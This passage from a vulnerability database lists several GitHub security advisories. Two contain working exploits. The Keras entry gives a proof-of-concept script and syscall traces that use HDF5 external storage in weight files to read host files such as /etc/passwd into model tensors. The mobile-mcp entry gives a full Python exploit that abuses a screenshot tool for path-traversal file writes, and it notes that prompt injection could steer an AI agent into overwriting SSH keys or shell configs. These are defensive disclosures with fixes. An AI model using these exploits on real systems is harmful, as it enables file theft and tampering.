    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)

    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())

if __name__ == "__main__":
    main()
  1. Execute python weights_external_demo.py.
  2. Observe:
  3. secret_text_source prints the chosen host file path.
  4. recovered_ascii/recovered_hex64 display the file contents recovered via model inference.
  5. A re-saved weights file contains the leaked bytes inside the artifact.

Expanded Validation (Multiple Attack Scenarios)

The following test harness generalises the attack for multiple HDF5 constructs:

  • Build a minimal feed-forward model and baseline weights.
  • Create three malicious variants:
  • External storage dataset: dataset references /etc/hosts.
  • External link: ExternalLink pointing at /etc/passwd.
  • Indirect link: external storage referencing a helper HDF5 that, in turn, refers to /etc/hostname.
  • Run each scenario under strace -f -e trace=open,openat,read while calling model.load_weights(...).
  • Post-process traces and weight tensors to show the exact bytes loaded.

Relevant syscall excerpts captured during the run:

openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13

The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.

Recommended Product Fix

  1. Default-deny external datasets/links:
  2. Inspect creation property lists (get_external_count) before materialising tensors.
  3. Resolve SoftLink / ExternalLink targets and block if they leave the HDF5 file.
  4. Provide an escape hatch:
  5. Offer an explicit allow_external_data=True flag or environment variable for advanced users who truly rely on HDF5 external storage.
  6. Documentation:
  7. Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
  8. Regression coverage:
  9. Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.

Workarounds

  • Avoid loading untrusted HDF5 weight files.
  • Pre-scan weight files using h5py to detect external datasets or links before invoking Keras loaders.
  • Prefer alternate formats (e.g., NumPy .npz) that lack external reference capabilities when exchanging weights.
  • If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.

Timeline (UTC)

  • 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
  • 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented safe_keras_hdf5.py prototype guard.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.13.0"
            },
            {
              "fixed": "3.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:41:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 \u201cexternal storage\u201d and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras \u201csafe mode\u201d only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact\u2014perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/\u003cuser\u003e/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n   - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n   - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n   - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025\u201110\u201119)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n  - `tensorflow==2.20.0`\n  - `keras==3.11.3`\n  - `h5py==3.15.1`\n  - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -\u003e Path:\n    candidates = [\n        os.environ.get(\"KFLI_PATH\"),\n        \"/etc/machine-id\",\n        \"/etc/hostname\",\n        \"/proc/sys/kernel/hostname\",\n        \"/etc/passwd\",\n    ]\n    for candidate in candidates:\n        if not candidate:\n            continue\n        path = Path(candidate)\n        if path.exists() and path.is_file():\n            return path\n    raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -\u003e tf.keras.Model:\n    model = tf.keras.Sequential([\n        tf.keras.layers.Input(shape=(1,), name=\"input\"),\n        tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n    ])\n    model(tf.zeros((1, 1)))  # build weights\n    return model\n\ndef find_bias_dataset(h5file: h5py.File) -\u003e str:\n    matches: list[str] = []\n    def visit(name: str, obj) -\u003e None:\n        if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n            matches.append(name)\n    h5file.visititems(visit)\n    if not matches:\n        raise RuntimeError(\"bias dataset not found\")\n    return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -\u003e tuple[int, int]:\n    with h5py.File(path, \"r+\") as h5file:\n        bias_path = find_bias_dataset(h5file)\n        parent = h5file[str(Path(bias_path).parent)]\n        dset_name = Path(bias_path).name\n        del parent[dset_name]\n        max_bytes = 128\n        size = host_file.stat().st_size\n        nbytes = min(size, max_bytes)\n        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing\n        units = max(1, nbytes // 4)\n        parent.create_dataset(\n            dset_name,\n            shape=(units,),\n            dtype=\"float32\",\n            external=[(host_file.as_posix(), 0, nbytes)],\n        )\n        return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -\u003e tuple[str, str]:\n    raw = np.ascontiguousarray(arr).view(np.uint8)\n    ascii_preview = bytes(b if 32 \u003c= b \u003c 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n    hex_preview = raw[:64].tobytes().hex()\n    return ascii_preview, hex_preview\n\ndef main() -\u003e None:\n    host_file = choose_host_file()\n    model = build_model(units=32)\n\n    weights_path = Path(\"weights_demo.h5\")\n    model.save_weights(weights_path.as_posix())\n\n    units, nbytes = rewrite_bias_external(weights_path, host_file)\n    print(\"secret_text_source\", host_file)\n    print(\"units\", units, \"bytes_mapped\", nbytes)\n\n    model.load_weights(weights_path.as_posix())\n    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n    ascii_preview, hex_preview = floats_to_ascii(output)\n    print(\"recovered_ascii\", ascii_preview)\n    print(\"recovered_hex64\", hex_preview)\n\n    saved = Path(\"weights_demo_resaved.h5\")\n    model.save_weights(saved.as_posix())\n    print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n   - `secret_text_source` prints the chosen host file path.\n   - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n   - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n  1. **External storage dataset**: dataset references `/etc/hosts`.\n  2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n  3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n   - Inspect creation property lists (`get_external_count`) before materialising tensors.\n   - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n   - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n   - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n   - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025\u201110\u201118**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025\u201110\u201119**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.",
  "id": "GHSA-3m4q-jmj6-r34q",
  "modified": "2026-02-18T22:41:58Z",
  "published": "2026-02-18T22:41:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/22057"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}

GHSA-3MF9-JJRH-XQV8

Vulnerability from github – Published: 2023-01-10 12:30 – Updated: 2024-04-09 09:31
VLAI
Details

A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions < V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-43513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-610",
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-10T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been identified in Automation License Manager V5 (All versions), Automation License Manager V6 (All versions \u003c V6.0 SP9 Upd4). The affected components allow to rename license files with user chosen input without authentication. This could allow an unauthenticated remote attacker to rename and move files as SYSTEM user.",
  "id": "GHSA-3mf9-jjrh-xqv8",
  "modified": "2024-04-09T09:31:07Z",
  "published": "2023-01-10T12:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43513"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-476715.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-556635.html"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-476715.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3P2M-H2V6-G9MX

Vulnerability from github – Published: 2026-03-27 19:13 – Updated: 2026-03-30 20:18
VLAI
Summary
@mobilenext/mobile-mcp alllows arbitrary file write via Path Traversal in mobile screen capture tools
Details

Summary

The @mobilenext/mobile-mcp server contains a Path Traversal vulnerability in the mobile_save_screenshot and mobile_start_screen_recording tools. The saveTo and output parameters were passed directly to filesystem operations without validation, allowing an attacker to write files outside the intended workspace.

Details

File: src/server.ts (lines 584-592)

tool(
    "mobile_save_screenshot",
    "Save Screenshot",
    "Save a screenshot of the mobile device to a file",
    {
        device: z.string().describe("The device identifier..."),
        saveTo: z.string().describe("The path to save the screenshot to"),
    },
    { destructiveHint: true },
    async ({ device, saveTo }) => {
        const robot = getRobotFromDevice(device);
        const screenshot = await robot.getScreenshot();
        fs.writeFileSync(saveTo, screenshot); // ← VULNERABLE: No path validation
        return `Screenshot saved to: ${saveTo}`;
    },
);

Root Cause

The saveTo parameter is passed directly to fs.writeFileSync() without any validation. The codebase has validation functions for other parameters (validatePackageName, validateLocale in src/utils.ts) but no path validation function exists.

Additional Affected Tool

File: src/server.ts (lines 597-620)

The mobile_start_screen_recording tool has the same vulnerability in its output parameter.

PoC

#!/usr/bin/env python3

import json
import os
import subprocess
import sys
import time
from datetime import datetime

SERVER_CMD = ["npx", "-y", "@mobilenext/mobile-mcp@latest"]
STARTUP_DELAY = 4
REQUEST_DELAY = 0.5


def log(level, msg):
    print(f"[{level.upper()}] {msg}")


def send_jsonrpc(proc, msg, timeout=REQUEST_DELAY):
    """Send JSON-RPC message and receive response."""
    try:
        proc.stdin.write(json.dumps(msg) + "\n")
        proc.stdin.flush()
        time.sleep(timeout)
        line = proc.stdout.readline()
        return json.loads(line) if line else None
    except Exception as e:
        log("error", f"Communication error: {e}")
        return None


def send_notification(proc, method, params=None):
    """Send JSON-RPC notification (no response expected)."""
    msg = {"jsonrpc": "2.0", "method": method}
    if params:
        msg["params"] = params
    proc.stdin.write(json.dumps(msg) + "\n")
    proc.stdin.flush()


def start_server():
    """Start the mobile-mcp server."""
    log("info", "Starting mobile-mcp server...")

    try:
        proc = subprocess.Popen(
            SERVER_CMD,
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )
        time.sleep(STARTUP_DELAY)

        if proc.poll() is not None:
            stderr = proc.stderr.read()
            log("error", f"Server failed to start: {stderr[:200]}")
            return None

        log("info", f"Server started (PID: {proc.pid})")
        return proc

    except FileNotFoundError:
        log("error", "npx not found. Please install Node.js")
        return None


def initialize_session(proc):
    """Initialize MCP session with handshake."""
    log("info", "Initializing MCP session...")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 1,
            "method": "initialize",
            "params": {
                "protocolVersion": "2024-11-05",
                "capabilities": {},
                "clientInfo": {"name": "mcpsec-exploit", "version": "1.0"},
            },
        },
    )

    if not resp or "error" in resp:
        log("error", f"Initialize failed: {resp}")
        return False

    send_notification(proc, "notifications/initialized")
    time.sleep(0.5)

    server_info = resp.get("result", {}).get("serverInfo", {})
    log("info", f"Session initialized - Server: {server_info.get('name')} v{server_info.get('version')}")
    return True


def get_devices(proc):
    """Get list of connected devices."""
    log("info", "Enumerating connected devices...")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 2,
            "method": "tools/call",
            "params": {"name": "mobile_list_available_devices", "arguments": {}},
        },
    )

    if resp:
        content = resp.get("result", {}).get("content", [{}])[0].get("text", "")
        try:
            devices = json.loads(content).get("devices", [])
            return devices
        except:
            log("warning", f"Could not parse device list: {content[:100]}")

    return []


def exploit_path_traversal(proc, device_id, target_path):
    """Execute path traversal exploit."""
    log("info", f"Target path: {target_path}")

    resp = send_jsonrpc(
        proc,
        {
            "jsonrpc": "2.0",
            "id": 100,
            "method": "tools/call",
            "params": {
                "name": "mobile_save_screenshot",
                "arguments": {"device": device_id, "saveTo": target_path},
            },
        },
        timeout=2,
    )

    if resp:
        content = resp.get("result", {}).get("content", [{}])
        if isinstance(content, list) and content:
            text = content[0].get("text", "")
            log("info", f"Server response: {text[:100]}")

            check_path = target_path
            if target_path.startswith(".."):
                check_path = os.path.normpath(os.path.join(os.getcwd(), target_path))

            if os.path.exists(check_path):
                size = os.path.getsize(check_path)
                log("info", f"FILE WRITTEN: {check_path} ({size} bytes)")
                return True, check_path, size
            elif "Screenshot saved" in text:
                log("info", f"Server confirmed write (file may be at relative path)")
                return True, target_path, 0

    log("warning", "Exploit may have failed or file not accessible")
    return False, target_path, 0


def main():
    device_id = sys.argv[1] if len(sys.argv) > 1 else None

    proc = start_server()
    if not proc:
        sys.exit(1)

    try:
        if not initialize_session(proc):
            sys.exit(1)

        if not device_id:
            devices = get_devices(proc)
            if devices:
                log("info", f"Found {len(devices)} device(s):")
                for d in devices:
                    print(f"  - {d.get('id')} - {d.get('name')} ({d.get('platform')}, {d.get('state')})")
                device_id = devices[0].get("id")
                log("info", f"Using device: {device_id}")
            else:
                log("error", "No devices found. Please connect a device and try again.")
                log("info", "Usage: python3 exploit.py <device_id>")
                sys.exit(1)

        home = os.path.expanduser("~")

        exploits = [
            "../../exploit_2_traversal.png",
            f"{home}/exploit.png",
            f"{home}/.poc_dotfile",
        ]

        results = []
        for target in exploits:
            success, path, size = exploit_path_traversal(proc, device_id, target)
            results.append((target, success, path, size))

    finally:
        proc.terminate()
        log("info", "Server terminated.")


if __name__ == "__main__":
    main()

Impact

A Prompt Injection attack from a malicious website or document could trick the AI into overwriting sensitive host files (e.g., ~/.bashrc, ~/.ssh/authorized_keys, or .config files) leading to a broken shell.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@mobilenext/mobile-mcp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.49"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33989"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T19:13:17Z",
    "nvd_published_at": "2026-03-27T22:16:22Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `@mobilenext/mobile-mcp` server contains a Path Traversal vulnerability in the `mobile_save_screenshot` and `mobile_start_screen_recording` tools. The `saveTo` and `output` parameters were passed directly to filesystem operations without validation, allowing an attacker to write files outside the intended workspace.\n\n### Details\n**File:** `src/server.ts` (lines 584-592)\n\n```typescript\ntool(\n    \"mobile_save_screenshot\",\n    \"Save Screenshot\",\n    \"Save a screenshot of the mobile device to a file\",\n    {\n        device: z.string().describe(\"The device identifier...\"),\n        saveTo: z.string().describe(\"The path to save the screenshot to\"),\n    },\n    { destructiveHint: true },\n    async ({ device, saveTo }) =\u003e {\n        const robot = getRobotFromDevice(device);\n        const screenshot = await robot.getScreenshot();\n        fs.writeFileSync(saveTo, screenshot); // \u2190 VULNERABLE: No path validation\n        return `Screenshot saved to: ${saveTo}`;\n    },\n);\n```\n\n### Root Cause\n\nThe `saveTo` parameter is passed directly to `fs.writeFileSync()` without any validation. The codebase has validation functions for other parameters (`validatePackageName`, `validateLocale` in `src/utils.ts`) but **no path validation function exists**.\n\n### Additional Affected Tool\n\n**File:** `src/server.ts` (lines 597-620)\n\nThe `mobile_start_screen_recording` tool has the same vulnerability in its `output` parameter.\n\n### PoC\n```py\n#!/usr/bin/env python3\n\nimport json\nimport os\nimport subprocess\nimport sys\nimport time\nfrom datetime import datetime\n\nSERVER_CMD = [\"npx\", \"-y\", \"@mobilenext/mobile-mcp@latest\"]\nSTARTUP_DELAY = 4\nREQUEST_DELAY = 0.5\n\n\ndef log(level, msg):\n    print(f\"[{level.upper()}] {msg}\")\n\n\ndef send_jsonrpc(proc, msg, timeout=REQUEST_DELAY):\n    \"\"\"Send JSON-RPC message and receive response.\"\"\"\n    try:\n        proc.stdin.write(json.dumps(msg) + \"\\n\")\n        proc.stdin.flush()\n        time.sleep(timeout)\n        line = proc.stdout.readline()\n        return json.loads(line) if line else None\n    except Exception as e:\n        log(\"error\", f\"Communication error: {e}\")\n        return None\n\n\ndef send_notification(proc, method, params=None):\n    \"\"\"Send JSON-RPC notification (no response expected).\"\"\"\n    msg = {\"jsonrpc\": \"2.0\", \"method\": method}\n    if params:\n        msg[\"params\"] = params\n    proc.stdin.write(json.dumps(msg) + \"\\n\")\n    proc.stdin.flush()\n\n\ndef start_server():\n    \"\"\"Start the mobile-mcp server.\"\"\"\n    log(\"info\", \"Starting mobile-mcp server...\")\n\n    try:\n        proc = subprocess.Popen(\n            SERVER_CMD,\n            stdin=subprocess.PIPE,\n            stdout=subprocess.PIPE,\n            stderr=subprocess.PIPE,\n            text=True,\n        )\n        time.sleep(STARTUP_DELAY)\n\n        if proc.poll() is not None:\n            stderr = proc.stderr.read()\n            log(\"error\", f\"Server failed to start: {stderr[:200]}\")\n            return None\n\n        log(\"info\", f\"Server started (PID: {proc.pid})\")\n        return proc\n\n    except FileNotFoundError:\n        log(\"error\", \"npx not found. Please install Node.js\")\n        return None\n\n\ndef initialize_session(proc):\n    \"\"\"Initialize MCP session with handshake.\"\"\"\n    log(\"info\", \"Initializing MCP session...\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 1,\n            \"method\": \"initialize\",\n            \"params\": {\n                \"protocolVersion\": \"2024-11-05\",\n                \"capabilities\": {},\n                \"clientInfo\": {\"name\": \"mcpsec-exploit\", \"version\": \"1.0\"},\n            },\n        },\n    )\n\n    if not resp or \"error\" in resp:\n        log(\"error\", f\"Initialize failed: {resp}\")\n        return False\n\n    send_notification(proc, \"notifications/initialized\")\n    time.sleep(0.5)\n\n    server_info = resp.get(\"result\", {}).get(\"serverInfo\", {})\n    log(\"info\", f\"Session initialized - Server: {server_info.get(\u0027name\u0027)} v{server_info.get(\u0027version\u0027)}\")\n    return True\n\n\ndef get_devices(proc):\n    \"\"\"Get list of connected devices.\"\"\"\n    log(\"info\", \"Enumerating connected devices...\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 2,\n            \"method\": \"tools/call\",\n            \"params\": {\"name\": \"mobile_list_available_devices\", \"arguments\": {}},\n        },\n    )\n\n    if resp:\n        content = resp.get(\"result\", {}).get(\"content\", [{}])[0].get(\"text\", \"\")\n        try:\n            devices = json.loads(content).get(\"devices\", [])\n            return devices\n        except:\n            log(\"warning\", f\"Could not parse device list: {content[:100]}\")\n\n    return []\n\n\ndef exploit_path_traversal(proc, device_id, target_path):\n    \"\"\"Execute path traversal exploit.\"\"\"\n    log(\"info\", f\"Target path: {target_path}\")\n\n    resp = send_jsonrpc(\n        proc,\n        {\n            \"jsonrpc\": \"2.0\",\n            \"id\": 100,\n            \"method\": \"tools/call\",\n            \"params\": {\n                \"name\": \"mobile_save_screenshot\",\n                \"arguments\": {\"device\": device_id, \"saveTo\": target_path},\n            },\n        },\n        timeout=2,\n    )\n\n    if resp:\n        content = resp.get(\"result\", {}).get(\"content\", [{}])\n        if isinstance(content, list) and content:\n            text = content[0].get(\"text\", \"\")\n            log(\"info\", f\"Server response: {text[:100]}\")\n\n            check_path = target_path\n            if target_path.startswith(\"..\"):\n                check_path = os.path.normpath(os.path.join(os.getcwd(), target_path))\n\n            if os.path.exists(check_path):\n                size = os.path.getsize(check_path)\n                log(\"info\", f\"FILE WRITTEN: {check_path} ({size} bytes)\")\n                return True, check_path, size\n            elif \"Screenshot saved\" in text:\n                log(\"info\", f\"Server confirmed write (file may be at relative path)\")\n                return True, target_path, 0\n\n    log(\"warning\", \"Exploit may have failed or file not accessible\")\n    return False, target_path, 0\n\n\ndef main():\n    device_id = sys.argv[1] if len(sys.argv) \u003e 1 else None\n\n    proc = start_server()\n    if not proc:\n        sys.exit(1)\n\n    try:\n        if not initialize_session(proc):\n            sys.exit(1)\n\n        if not device_id:\n            devices = get_devices(proc)\n            if devices:\n                log(\"info\", f\"Found {len(devices)} device(s):\")\n                for d in devices:\n                    print(f\"  - {d.get(\u0027id\u0027)} - {d.get(\u0027name\u0027)} ({d.get(\u0027platform\u0027)}, {d.get(\u0027state\u0027)})\")\n                device_id = devices[0].get(\"id\")\n                log(\"info\", f\"Using device: {device_id}\")\n            else:\n                log(\"error\", \"No devices found. Please connect a device and try again.\")\n                log(\"info\", \"Usage: python3 exploit.py \u003cdevice_id\u003e\")\n                sys.exit(1)\n\n        home = os.path.expanduser(\"~\")\n\n        exploits = [\n            \"../../exploit_2_traversal.png\",\n            f\"{home}/exploit.png\",\n            f\"{home}/.poc_dotfile\",\n        ]\n\n        results = []\n        for target in exploits:\n            success, path, size = exploit_path_traversal(proc, device_id, target)\n            results.append((target, success, path, size))\n\n    finally:\n        proc.terminate()\n        log(\"info\", \"Server terminated.\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\nA Prompt Injection attack from a malicious website or document could trick the AI into overwriting sensitive host files (e.g., `~/.bashrc`, `~/.ssh/authorized_keys`, or `.config` files) leading to a broken shell.",
  "id": "GHSA-3p2m-h2v6-g9mx",
  "modified": "2026-03-30T20:18:39Z",
  "published": "2026-03-27T19:13:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/security/advisories/GHSA-3p2m-h2v6-g9mx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33989"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/commit/f5e32295903128c1e71cf915ae6c0b76c7b0153b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mobile-next/mobile-mcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mobile-next/mobile-mcp/releases/tag/0.0.49"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@mobilenext/mobile-mcp alllows arbitrary file write via Path Traversal in mobile screen capture tools"
}

GHSA-3PGG-FXM7-XV3P

Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32
VLAI
Details

NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-0087"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-14T14:39:28Z",
    "severity": "CRITICAL"
  },
  "details": "NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.",
  "id": "GHSA-3pgg-fxm7-xv3p",
